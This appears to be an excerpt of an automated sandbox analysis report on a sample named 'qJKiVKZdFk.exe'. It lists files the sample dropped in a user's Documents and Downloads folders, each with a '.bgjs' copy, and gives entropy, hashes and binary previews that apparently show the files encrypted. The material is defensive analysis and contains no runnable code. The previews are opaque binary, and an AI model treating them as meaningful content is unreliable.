                                                                                                                                      Preview:NYMMP .....x)/.@8<...F..e.......m6s....$........,n..`.o5i5V.....,...9v..}....|[l~..9E......S...../.m..Y..>|.o.sK3.<...|.Q.Dded]L..-.G'.f...l.$c:a..b#...E.g]........W'..WM.S7q/.>utw...p0e.|1-,...y...auPC..T.). 3....G..b.t..I..mmx.K.[...i.....~..vz[....-...+...*....~...*..q.......G..T.i.....b9..r.b..L.....b.4.w...B[1#l.?....nfc.xB.[d..P.I...k...e...h.....bc@q\#.3.M...U.....Tz.;qD.......N.L.L..p....{.H..)k.....o7....V*>..zD..>...r3`.`..$^...E..;."...c.0...<Cu........>.........]..=.P......y....(.C...[3.Ih......)`5...!l.._..Q...kr&M{...)5}...C..8zY9.W....W.co..Q'"...5..!...N..#L.3.v.Pw..U.x.uGu>..l>nk....,...W.N....kZ..].G...b..;....+8.V.N#.......q..)._..b..]..5....L..."!.Xe.\...z1..qS0...m..C/&%d{..m....n...E....l.e..d.K.lV....8....K...m..o.&.....%..2.xF.).U.?>g.N.{.......T.<.f.4P.T.).1.S..S..nH..WU..W....w.3F..-rM..ASh..X..F..S...0.M4..*..p5j!....1...?@.,t.%..!..t.I9.@M..........x.].B...~._.~U.Uen...O%/..-......gUN.....B..B..0..a..

                                                                                                                                      C:\Users\user\Documents\QCOILOQIKC\NYMMPCEIMA.xlsx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.843758453620388
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:kVRnfU9OzdMSYfY4zXSaz1stIFvPUXljubzCbzhoRe0yFPbD:UfUAxMSYw4zXSaz1sehP6ibzMVkexFTD
                                                                                                                                      MD5:8C02DCC05834A3BB57EF6172510D8EE5
                                                                                                                                      SHA1:172BD268C2EFE29C1FD380962DD37209B5222C4C
                                                                                                                                      SHA-256:9E22F90A64E4121AB1EEF724CC9EAB786837ACD4A69211F471F2E1D01B390E64
                                                                                                                                      SHA-512:093F0DBC16D78DE5E6CB6D4C77D40CE5DC9E32315F5B3ED4D2D70D6A4AA9FCF07385CA7CA9700E17F6802A2F0B7462B6E942471EF00C0121A7F3EE8E2F54727D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMP .....x)/.@8<...F..e.......m6s....$........,n..`.o5i5V.....,...9v..}....|[l~..9E......S...../.m..Y..>|.o.sK3.<...|.Q.Dded]L..-.G'.f...l.$c:a..b#...E.g]........W'..WM.S7q/.>utw...p0e.|1-,...y...auPC..T.). 3....G..b.t..I..mmx.K.[...i.....~..vz[....-...+...*....~...*..q.......G..T.i.....b9..r.b..L.....b.4.w...B[1#l.?....nfc.xB.[d..P.I...k...e...h.....bc@q\#.3.M...U.....Tz.;qD.......N.L.L..p....{.H..)k.....o7....V*>..zD..>...r3`.`..$^...E..;."...c.0...<Cu........>.........]..=.P......y....(.C...[3.Ih......)`5...!l.._..Q...kr&M{...)5}...C..8zY9.W....W.co..Q'"...5..!...N..#L.3.v.Pw..U.x.uGu>..l>nk....,...W.N....kZ..].G...b..;....+8.V.N#.......q..)._..b..]..5....L..."!.Xe.\...z1..qS0...m..C/&%d{..m....n...E....l.e..d.K.lV....8....K...m..o.&.....%..2.xF.).U.?>g.N.{.......T.<.f.4P.T.).1.S..S..nH..WU..W....w.3F..-rM..ASh..X..F..S...0.M4..*..p5j!....1...?@.,t.%..!..t.I9.@M..........x.].B...~._.~U.Uen...O%/..-......gUN.....B..B..0..a..

                                                                                                                                      C:\Users\user\Documents\QCOILOQIKC\QCOILOQIKC.docx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.825827803880659
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:6VOWSA2UR330LDqqZGx8SpGuuCcVk2a7NF+70T39DSIfdorbD:6VOFNI3yGqZrSouuCcVbc+70T1S7D
                                                                                                                                      MD5:4366693BBD7473A728E4A051AFF09196
                                                                                                                                      SHA1:AAE2EB50C39890C5AC6998B6C0717BCABAAE1DC2
                                                                                                                                      SHA-256:C93D69B00A7AEE56F666FC9DB5A77F4850BA00E0C80F44E2CE9624A6B6996EE8
                                                                                                                                      SHA-512:85E22BD663403DCB3B38D0D5DC6890C7D273928FE3B98172B609CDF913B878096C84CBE4CEFD2B0D72E7A445C497CC08F8866906657A50952A08254FE7203F70
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:QCOIL....S.1q...7.W.~.A...3..7.../e."F.gP.u...T..+/./q.......jR}.QK.......j.f...O.X......H..Xp....q.}O..f.x...s.....{U=R..hX.T.0.;....i3.x%.?.0.u6:.-T.1RM.9.z.X.......XM....[.?..%.l....2t.>..Y7.'b T...0.....O..j...#o.....o..?s...7...[.b,.%.0...k..E/.Tj...7..@o..zq.8\.....3(....C.+..m..v....E../P.i...1.......*.`v..J.N.Ca..8..u...N..%K...WM....H....<......*/.ge..l.>....P..:...%[...d%..A...q..#5 ..1.S.fY........d..#..(%A...x..Z.f.......!..63x..P=..32.=..t..Ly@@R.w......W...G*1....M[..4...Yi.W...t...z..Qc.......T?hE...p..F[q..T.%........#.../.d.1..d..........Uc..I.....z.,....k...W.H...6............s..hx.........>.x..{&FHB...,..t..i.x~...Z.}..y.[3+..%H..&T.&...U...s]1.n.....~0b3....l..z....T...\F...>=.J...d`....7]z.f...x.5...su[..G...;....nO...O...T.U.L.U}..p.z..=.+..+Xi..E...m.[Xr...B..TRE...5z.la........m....?m...1.d...=.6V.jw....i]...G....Q._GM.6U.%...X.}8.Q...T..f........1..&...g7.T...g......B.S!..&....h89....m/..U..e.g...>Xug..Hj....C.M..

                                                                                                                                      C:\Users\user\Documents\QCOILOQIKC\QCOILOQIKC.docx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.825827803880659
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:6VOWSA2UR330LDqqZGx8SpGuuCcVk2a7NF+70T39DSIfdorbD:6VOFNI3yGqZrSouuCcVbc+70T1S7D
                                                                                                                                      MD5:4366693BBD7473A728E4A051AFF09196
                                                                                                                                      SHA1:AAE2EB50C39890C5AC6998B6C0717BCABAAE1DC2
                                                                                                                                      SHA-256:C93D69B00A7AEE56F666FC9DB5A77F4850BA00E0C80F44E2CE9624A6B6996EE8
                                                                                                                                      SHA-512:85E22BD663403DCB3B38D0D5DC6890C7D273928FE3B98172B609CDF913B878096C84CBE4CEFD2B0D72E7A445C497CC08F8866906657A50952A08254FE7203F70
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:QCOIL....S.1q...7.W.~.A...3..7.../e."F.gP.u...T..+/./q.......jR}.QK.......j.f...O.X......H..Xp....q.}O..f.x...s.....{U=R..hX.T.0.;....i3.x%.?.0.u6:.-T.1RM.9.z.X.......XM....[.?..%.l....2t.>..Y7.'b T...0.....O..j...#o.....o..?s...7...[.b,.%.0...k..E/.Tj...7..@o..zq.8\.....3(....C.+..m..v....E../P.i...1.......*.`v..J.N.Ca..8..u...N..%K...WM....H....<......*/.ge..l.>....P..:...%[...d%..A...q..#5 ..1.S.fY........d..#..(%A...x..Z.f.......!..63x..P=..32.=..t..Ly@@R.w......W...G*1....M[..4...Yi.W...t...z..Qc.......T?hE...p..F[q..T.%........#.../.d.1..d..........Uc..I.....z.,....k...W.H...6............s..hx.........>.x..{&FHB...,..t..i.x~...Z.}..y.[3+..%H..&T.&...U...s]1.n.....~0b3....l..z....T...\F...>=.J...d`....7]z.f...x.5...su[..G...;....nO...O...T.U.L.U}..p.z..=.+..+Xi..E...m.[Xr...B..TRE...5z.la........m....?m...1.d...=.6V.jw....i]...G....Q._GM.6U.%...X.}8.Q...T..f........1..&...g7.T...g......B.S!..&....h89....m/..U..e.g...>Xug..Hj....C.M..

                                                                                                                                      C:\Users\user\Documents\QCOILOQIKC\ZIPXYXWIOY.pdf

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.834648952307821
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Y3V4455rJ4K9pkrmA4jtFPabPKngsGXVzZ1RBhRnbbp0OymmneYxqbD:YB55rJ4QpRZt8LKnnCVzLnjbNyb3ID
                                                                                                                                      MD5:72C69C8A1103FB5FDE0E240256346488
                                                                                                                                      SHA1:B690A90E031A52BB1F57A9E90C7E94745C54DE98
                                                                                                                                      SHA-256:B859D9D4D40D9F517BEA20B4B06D95C79E27305262438B925E3BECB35FB3650E
                                                                                                                                      SHA-512:AAD4B897E58E2CB5F4BAF42EB41A4EDB1F12A7D8B61282F30B9D44C3493FD9E5D1903EBDC4105A778EDECE18D5CEAF555E38120F8953BE7697F07EF21B9A2F78
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:ZIPXY..r..Xp`.".&.e0..a!6{f*.\......FJ....`n.....P...eA.f..s..%..S.....^.T...(N.O.4.DJN.Q...pyJ..$n..6..q......?.[..../...k.."...R.4.3.u..."+...P....x........a41.r...v"z.(.)...5$8.~t..~.J.!{./.mn*...!...!...).+:...[.q.+..*u.y......._@....n.K....y.bEP&..weI......K.L...X......,.U9..5..c..q.....LQ..{.....N,..C.'.......z4.V...%.9.3..B..Q.^..SA..z...U..GN......|.=".........6..E...n2R....nL.n.nI..,.}.P....I..e..o.....=.s\.Z~>...........*m.... ks2tFC)..B...BS...<s..!....J. ....3+K.../..=..u.txK$C_.Z&..<.PE......:....P.X...p.(..>.d.......1.`.B..;.t!...q.v......?../R.T..mV...D.....y..!|......I<....5..N..Kb.}.G...,O2j.9...R.{....W".8.....R......z...L...'......RN....Y{6\...~,..M......u.T..J...D..Y.Pj.w..)v.......Us..#.A6.a.p..9+.J.'..B....(u.-Q.......y.s.U..,.,.g..m..m.RS+...Q..j.....dJ^U...oC..>...w..Ax.2.....Ln.3E.+6...q..H...(p.s._....G._..v.~..6> .#...?N..7..N.'m....R.{.!.......^..m,..('......F..9....w.J!\.;....5V....D..8F.o\d.:..V.=[/..y

                                                                                                                                      C:\Users\user\Documents\QCOILOQIKC\ZIPXYXWIOY.pdf.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.834648952307821
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Y3V4455rJ4K9pkrmA4jtFPabPKngsGXVzZ1RBhRnbbp0OymmneYxqbD:YB55rJ4QpRZt8LKnnCVzLnjbNyb3ID
                                                                                                                                      MD5:72C69C8A1103FB5FDE0E240256346488
                                                                                                                                      SHA1:B690A90E031A52BB1F57A9E90C7E94745C54DE98
                                                                                                                                      SHA-256:B859D9D4D40D9F517BEA20B4B06D95C79E27305262438B925E3BECB35FB3650E
                                                                                                                                      SHA-512:AAD4B897E58E2CB5F4BAF42EB41A4EDB1F12A7D8B61282F30B9D44C3493FD9E5D1903EBDC4105A778EDECE18D5CEAF555E38120F8953BE7697F07EF21B9A2F78
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:ZIPXY..r..Xp`.".&.e0..a!6{f*.\......FJ....`n.....P...eA.f..s..%..S.....^.T...(N.O.4.DJN.Q...pyJ..$n..6..q......?.[..../...k.."...R.4.3.u..."+...P....x........a41.r...v"z.(.)...5$8.~t..~.J.!{./.mn*...!...!...).+:...[.q.+..*u.y......._@....n.K....y.bEP&..weI......K.L...X......,.U9..5..c..q.....LQ..{.....N,..C.'.......z4.V...%.9.3..B..Q.^..SA..z...U..GN......|.=".........6..E...n2R....nL.n.nI..,.}.P....I..e..o.....=.s\.Z~>...........*m.... ks2tFC)..B...BS...<s..!....J. ....3+K.../..=..u.txK$C_.Z&..<.PE......:....P.X...p.(..>.d.......1.`.B..;.t!...q.v......?../R.T..mV...D.....y..!|......I<....5..N..Kb.}.G...,O2j.9...R.{....W".8.....R......z...L...'......RN....Y{6\...~,..M......u.T..J...D..Y.Pj.w..)v.......Us..#.A6.a.p..9+.J.'..B....(u.-Q.......y.s.U..,.,.g..m..m.RS+...Q..j.....dJ^U...oC..>...w..Ax.2.....Ln.3E.+6...q..H...(p.s._....G._..v.~..6> .#...?N..7..N.'m....R.{.!.......^..m,..('......F..9....w.J!\.;....5V....D..8F.o\d.:..V.=[/..y

                                                                                                                                      C:\Users\user\Documents\VWDFPKGDUF.mp3

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.864328821571187
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ozqP9wU4KRqkxHmfnPvmTvVhc855JxOk4UNIcn+7t7x0K2KE6VwoZN8mPvYqVbD:oz89wU/RqYmfHkoeUUycn2t7P2K3WozP
                                                                                                                                      MD5:59EBEFC14A1E646E1F262C2BE98DE829
                                                                                                                                      SHA1:2C43C20B73AA2E2C7E6E9D38B4E4116AB12AEE84
                                                                                                                                      SHA-256:6E0FCF54B1213BA528FB6F0A23DFE211EF3198614A7AF290521BA5E2C25EE9FD
                                                                                                                                      SHA-512:100D3A10BACEB795FF506C6121A774DBB4172DE2976BEB13192C9A70A8F40CD74005F6C75DB3BEAD741778206C264EEEB6F1F1031656328ADA16D1173A4163CB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:VWDFPQ./...H..Q.?.......D...E.q:.y..g.3.N....5k..O.y_.~p.....h..s.v..B../.....G.*..UTC ..J.....d.$u.l.."E....I..H.x.........%.....0_.6L4.].h......!N.R.....].mU...a1.o.k.}.l,.@.C\.x.d..........\MZ}.U...<bw.m...a....Mv.+M%..AW..e....FG\.U.....<....].&H.f..ZhPJ....j..I...J.U*d...z....Y.5..W.1....wtO..Mv.j.X..TN.. CJ.G,0...OC.......V-.:@.@.."..2..j...@{..B.g.K.U....P....g.....h...@.[.Cg.C..j.%.h..WKj.Z.>....8.....R.sq;.Yb...WPC......W.....s.<...?.Z.}..;".3........%..W...)........s.t..P.p.hj.6r.../......I.p.:i. $....b......Y.. <Q..f..`L.=.`B\..Z..C.U..m..nX.-K.....n...$.~L8WS;.ac.R..f.........-......i...h...-U..4Z.5G...........C..... l..?P.{......a.M..../@........e./E.A.6Y..}.;..8lM`!..>....H...w...m.H.tqqp.w.......n6h.P(.e.$D-.<.iy.....)._.q..F.,d@.YNi.5....p22.'.....h..M.h........}..%'.......@..5yw..l|^o.Kn#..g....0..l...l....b ...Rt.O.lG..@.;t7.m.r....%...w....>X..%@.<a&MIH...M..m....)..rt...z....TQ..Q..&...(^.L<T).........0.8#.O...V..F......

                                                                                                                                      C:\Users\user\Documents\VWDFPKGDUF.mp3.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.864328821571187
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ozqP9wU4KRqkxHmfnPvmTvVhc855JxOk4UNIcn+7t7x0K2KE6VwoZN8mPvYqVbD:oz89wU/RqYmfHkoeUUycn2t7P2K3WozP
                                                                                                                                      MD5:59EBEFC14A1E646E1F262C2BE98DE829
                                                                                                                                      SHA1:2C43C20B73AA2E2C7E6E9D38B4E4116AB12AEE84
                                                                                                                                      SHA-256:6E0FCF54B1213BA528FB6F0A23DFE211EF3198614A7AF290521BA5E2C25EE9FD
                                                                                                                                      SHA-512:100D3A10BACEB795FF506C6121A774DBB4172DE2976BEB13192C9A70A8F40CD74005F6C75DB3BEAD741778206C264EEEB6F1F1031656328ADA16D1173A4163CB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:VWDFPQ./...H..Q.?.......D...E.q:.y..g.3.N....5k..O.y_.~p.....h..s.v..B../.....G.*..UTC ..J.....d.$u.l.."E....I..H.x.........%.....0_.6L4.].h......!N.R.....].mU...a1.o.k.}.l,.@.C\.x.d..........\MZ}.U...<bw.m...a....Mv.+M%..AW..e....FG\.U.....<....].&H.f..ZhPJ....j..I...J.U*d...z....Y.5..W.1....wtO..Mv.j.X..TN.. CJ.G,0...OC.......V-.:@.@.."..2..j...@{..B.g.K.U....P....g.....h...@.[.Cg.C..j.%.h..WKj.Z.>....8.....R.sq;.Yb...WPC......W.....s.<...?.Z.}..;".3........%..W...)........s.t..P.p.hj.6r.../......I.p.:i. $....b......Y.. <Q..f..`L.=.`B\..Z..C.U..m..nX.-K.....n...$.~L8WS;.ac.R..f.........-......i...h...-U..4Z.5G...........C..... l..?P.{......a.M..../@........e./E.A.6Y..}.;..8lM`!..>....H...w...m.H.tqqp.w.......n6h.P(.e.$D-.<.iy.....)._.q..F.,d@.YNi.5....p22.'.....h..M.h........}..%'.......@..5yw..l|^o.Kn#..g....0..l...l....b ...Rt.O.lG..@.;t7.m.r....%...w....>X..%@.<a&MIH...M..m....)..rt...z....TQ..Q..&...(^.L<T).........0.8#.O...V..F......

                                                                                                                                      C:\Users\user\Documents\ZIPXYXWIOY.pdf

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.866074992356422
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:AavH1aDSesmdsXhTM2Yv1PNgMM6EMxs7BRwGSZuJvG5gNPAIRydge7wulMFjbD:NvcG/mdsujNgM7YBy9ZevGEBEdP7wulG
                                                                                                                                      MD5:95B9E2B701C4E203950D20FA8F2E3CD0
                                                                                                                                      SHA1:64986203A99BFCC3E085EA28FC9191809FA74084
                                                                                                                                      SHA-256:2CF0A407AB1152162E3963EB4EC00D8B7EE2576159E7B2014E041180F7410149
                                                                                                                                      SHA-512:7F12F2580EDD595E0A933A4AFB395FB0388D068E47A00A0906BD9C10E59A0C7CE802638DB9F98D131C6C3C5A846CA551201A2DCF4B9FA4F98D71C63A21BCE57B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:ZIPXY...K..bIt.U...\p.y...f1..._B!j....2.-..zZ.......&....e .hH..[.$<;.3t...F....@..}.G....FB.F..3.K.".8.m.....r...L..>.0~....e1.RK...%.=..Df..:...`...J.,...........cW...u.~L...;0......i.h1.0q.}.f]7..?v8_M...9..0...d~.P.Ue...$.k./F...N.;.~.J...&.ul._.YG=.%t:g/Ob...U.l. H....0...L..a..%.9?.K..).$...:J...gR5..z..9..R...!p.j7..a...s.'+:X...@....L.=o.e...7@..U?.....@.i<..g.....i!..8w..`.H..R.5S.....=0.}..}......a.SA..N.ZH.s..u.U..`...O.b..?",.).*.w.^.3n.i....E....b.f.d.|..M...pT..P....f.OQ._.OW.%:s@...&........f...,E7I..8..9.pef.lXad.Wt..F..y.Ymx.......&..:W.....3~!....!.. ...C.k.^.i.6.......:...Y....a$.....A.....n(!.D#...L...f.....%3R..b..:......f.1N...M.:.....Z.....[-;...!>.g..}.....a6*......_...D...^....|.G..{.....'..UG..2{..K...h.%G......k,...^.=.[......;/.+J....6...}.$....4..........`.\.g.Y$!H.|....R...WNhW/.[......%......j.Q...C...h.~....C..6.R../t.a.Sl.w..j...Jy...O.yz.....}sI..e.h.....S=..'<+.j.9..a..n.,Ug.b.s.].....a/...|.Y....O.J

                                                                                                                                      C:\Users\user\Documents\ZIPXYXWIOY.pdf.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.866074992356422
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:AavH1aDSesmdsXhTM2Yv1PNgMM6EMxs7BRwGSZuJvG5gNPAIRydge7wulMFjbD:NvcG/mdsujNgM7YBy9ZevGEBEdP7wulG
                                                                                                                                      MD5:95B9E2B701C4E203950D20FA8F2E3CD0
                                                                                                                                      SHA1:64986203A99BFCC3E085EA28FC9191809FA74084
                                                                                                                                      SHA-256:2CF0A407AB1152162E3963EB4EC00D8B7EE2576159E7B2014E041180F7410149
                                                                                                                                      SHA-512:7F12F2580EDD595E0A933A4AFB395FB0388D068E47A00A0906BD9C10E59A0C7CE802638DB9F98D131C6C3C5A846CA551201A2DCF4B9FA4F98D71C63A21BCE57B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:ZIPXY...K..bIt.U...\p.y...f1..._B!j....2.-..zZ.......&....e .hH..[.$<;.3t...F....@..}.G....FB.F..3.K.".8.m.....r...L..>.0~....e1.RK...%.=..Df..:...`...J.,...........cW...u.~L...;0......i.h1.0q.}.f]7..?v8_M...9..0...d~.P.Ue...$.k./F...N.;.~.J...&.ul._.YG=.%t:g/Ob...U.l. H....0...L..a..%.9?.K..).$...:J...gR5..z..9..R...!p.j7..a...s.'+:X...@....L.=o.e...7@..U?.....@.i<..g.....i!..8w..`.H..R.5S.....=0.}..}......a.SA..N.ZH.s..u.U..`...O.b..?",.).*.w.^.3n.i....E....b.f.d.|..M...pT..P....f.OQ._.OW.%:s@...&........f...,E7I..8..9.pef.lXad.Wt..F..y.Ymx.......&..:W.....3~!....!.. ...C.k.^.i.6.......:...Y....a$.....A.....n(!.D#...L...f.....%3R..b..:......f.1N...M.:.....Z.....[-;...!>.g..}.....a6*......_...D...^....|.G..{.....'..UG..2{..K...h.%G......k,...^.=.[......;/.+J....6...}.$....4..........`.\.g.Y$!H.|....R...WNhW/.[......%......j.Q...C...h.~....C..6.R../t.a.Sl.w..j...Jy...O.yz.....}sI..e.h.....S=..'<+.j.9..a..n.,Ug.b.s.].....a/...|.Y....O.J

                                                                                                                                      C:\Users\user\Downloads\CZQKSDDMWR.png

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.861888832039324
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Fv8KI2zKQAwl5U/LoX+edaNl1x986vo8SmXGSWdzixe4+LCw+P0KPcyhv28AZbD:pTI0Kt7/L6aNrwMo8FXGSWBiCryPcyhy
                                                                                                                                      MD5:D88DC4A34FC21C72CC00477CEC1BADFE
                                                                                                                                      SHA1:5797052E4E4D6C18A4237524DB2E39ED0088BE21
                                                                                                                                      SHA-256:87D07B0D456D63624BE295717CFCF4216B6D37964C6B5ABB16EC09FBF8C822AA
                                                                                                                                      SHA-512:33548F569FB63645CB69B39B36C9A8F6E8539C597527AD5809F5EDC1943F2568554FB4AC33469DF2885F70636F53D724694647D34A63B75D1C84CF0847C27FE0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CZQKS..>.U....6.?*.......$..i2......7.4..j5C/lo..... j......s.~..h..Z{h...)W...]7...'o...Z;..J&.K.h..O..Rd`0\..\a._.w.1._sv...V.Pj.....O..X..P....2..h..+~.o....mSI.....T.wm.....E>.;........5^..fLx........Y.g..<.......)u...:y...[1..<....13.\1...J...}/...Q...N9.7.{..N.0R.\".u|......6.0.B..P.N...lu.,|.S..6.O:...Z.=..?\VR.4.OZ....,1.....Y.P...xr....W..._.....g..?f..TG..]=.....U*_p`..x.....7.......f.q$.v...g".....N.YW7..s..@.@+...g..a..A.>..$k.E. k...2..W..5Yv.V.).6W!.zUz.|.a...g.......D&../.i.....,g...(.vPS.4.)d.._........-.N.ac.`..p.M.Y.....:=p.Ef}......Cu.!^..BT.IG..7..Q`MIO.J..cR.<...S.n.C../.1..e...r....P...v.b>oJ..7.....K..........U....I.g........@Z..w.x.....B..c.....N.>....DnFP.8..K..F\.W..G.X.@.p0.g_s.z....r.4...u..L.......G.|^3..CH.";....E...G.h...mz..*a..l..z..e?...6[l..C.KJ.rBMx....;A0..i.S.].{.c.gtq.Z...V ....r.G.B.&...e..n...Z....z...C.9.p.U..|. .ADnq..K.....u....3M..v.....A.O&4.....zY.*..u...u......6..D..i.W....>..

                                                                                                                                      C:\Users\user\Downloads\CZQKSDDMWR.png.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.861888832039324
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Fv8KI2zKQAwl5U/LoX+edaNl1x986vo8SmXGSWdzixe4+LCw+P0KPcyhv28AZbD:pTI0Kt7/L6aNrwMo8FXGSWBiCryPcyhy
                                                                                                                                      MD5:D88DC4A34FC21C72CC00477CEC1BADFE
                                                                                                                                      SHA1:5797052E4E4D6C18A4237524DB2E39ED0088BE21
                                                                                                                                      SHA-256:87D07B0D456D63624BE295717CFCF4216B6D37964C6B5ABB16EC09FBF8C822AA
                                                                                                                                      SHA-512:33548F569FB63645CB69B39B36C9A8F6E8539C597527AD5809F5EDC1943F2568554FB4AC33469DF2885F70636F53D724694647D34A63B75D1C84CF0847C27FE0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CZQKS..>.U....6.?*.......$..i2......7.4..j5C/lo..... j......s.~..h..Z{h...)W...]7...'o...Z;..J&.K.h..O..Rd`0\..\a._.w.1._sv...V.Pj.....O..X..P....2..h..+~.o....mSI.....T.wm.....E>.;........5^..fLx........Y.g..<.......)u...:y...[1..<....13.\1...J...}/...Q...N9.7.{..N.0R.\".u|......6.0.B..P.N...lu.,|.S..6.O:...Z.=..?\VR.4.OZ....,1.....Y.P...xr....W..._.....g..?f..TG..]=.....U*_p`..x.....7.......f.q$.v...g".....N.YW7..s..@.@+...g..a..A.>..$k.E. k...2..W..5Yv.V.).6W!.zUz.|.a...g.......D&../.i.....,g...(.vPS.4.)d.._........-.N.ac.`..p.M.Y.....:=p.Ef}......Cu.!^..BT.IG..7..Q`MIO.J..cR.<...S.n.C../.1..e...r....P...v.b>oJ..7.....K..........U....I.g........@Z..w.x.....B..c.....N.>....DnFP.8..K..F\.W..G.X.@.p0.g_s.z....r.4...u..L.......G.|^3..CH.";....E...G.h...mz..*a..l..z..e?...6[l..C.KJ.rBMx....;A0..i.S.].{.c.gtq.Z...V ....r.G.B.&...e..n...Z....z...C.9.p.U..|. .ADnq..K.....u....3M..v.....A.O&4.....zY.*..u...u......6..D..i.W....>..

                                                                                                                                      C:\Users\user\Downloads\GLTYDMDUST.mp3

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.838504916812677
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:/Xr46VyNI+fFEAjhxkCLL0eIGe3aicsp9zMiFMk5UjDMebD:/r46VDEEMLL0dpaicsp9zMoB5UjD3D
                                                                                                                                      MD5:443630553740EA9110CF611211241142
                                                                                                                                      SHA1:02752F854068C90659EBFD31E3B3C2EF2E419569
                                                                                                                                      SHA-256:E9F4983781999119429180D554DF29879F2B4BBE374AF3DA81568B740BAFB974
                                                                                                                                      SHA-512:1A9942349372AB7C4541F8D0761455A6F51A6921ABD62EADBDFBACD042B67D71683637E74CBED9941FFC1A94AC58A0591021CB726D196AFB03D3F9E7D7DFED7A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYDx..6.......z.lHa..r?P..&%'.:.r....5...a*n...%(3^'.N;...a..B../..OX.{...S.:.M3.....w."a7.z~V.....bW..;....^h...._a....."+..]x.8#..p..[..3d...0.."...."..9D.~w..}...Aw.t.t.N..f5.MTu..q6./,@...~.O.\..%I....;f.*[.....(.x....^az........#.H..1.<y/w..n6V.n...co...J..=L.....a.=4.x.]i..p.58....jnz.\...:.{<.6.7V.G?...Y..!...0w6...+..^.....g.r....x...Bu...e..$.#..{Q.....0.1..!.G=.d;...plN........a...2..P,.j._.(...~..D.Q.b.....S...i?..a....L.^PR.<c$T...,Ey...:..k.j1O..v l..1i_7.:...z..J.Vm..x.+9..VLs...z.;"M..I.ET$..3`n....=._..Ii.;V....6.=..qCR..7X.D],..;L0...GC....N6st.....hu.:[Q.k.X.....K..J.....>"...A....wDB..S..........$..\MrE[!....>..kp.5.......`6y...|.T....]j..2.2v.L....%....H........ME.qF!...>..i~x.%. ..F..+.......P"2.. .@.@.}Q...j....\.X.K]..=%.;....sY|0l...%RTJz..u.D.....gID...,.........R. I.|n%..>..D_d..J;.B...%.#.y.Ev.6..iO.........Dw...M.s...J+<-8....dj...7.N-.ZPP.....u.PZa..4?J|W.b...q%......~\...~>..c]...#.u... ..!o.u.X..).-e...H.>

                                                                                                                                      C:\Users\user\Downloads\GLTYDMDUST.mp3.bgjs (copy)

                                                                                                                                      Download File
